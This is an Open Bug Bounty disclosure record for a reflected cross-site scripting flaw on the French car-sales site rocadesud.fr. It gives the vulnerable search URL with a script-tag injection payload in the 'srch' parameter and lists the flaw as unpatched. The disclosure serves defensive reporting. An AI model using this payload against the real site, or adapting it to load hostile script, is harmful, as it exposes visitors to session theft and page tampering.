rocadesud.fr XSS vulnerability

2016-04-19T19:15:00
ID OBB:147448
Type openbugbounty
Reporter iwoodythecowboy
Modified 2016-07-12T20:12:00

Description

Vulnerable URL:
http://www.rocadesud.fr/rechercher.php?srch=t%22%3E%3Cscript%20src=https://openbugbounty.org/1.js%3E*0|tBerline*0|tBreak*0|tSUV*0|tCabriolet*0|tCoupe*0|tMonospace*0|tAncienne*0|tUtilitaire*0|marque*AUDI|gamme*|energie*|transmission*|km_mini*0|km_maxi*200000|px_mini*0|px_maxi*120000|

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 26.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 4763100
VIP website status:| No
rocadesud.fr SSL connection grade:| F

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 April, 2016 19:15 GMT
Generic security notifications sent to website owner| 19 April, 2016 19:17 GMT
Vulnerability details disclosed by researcher| 12 July, 2016 20:12 GMT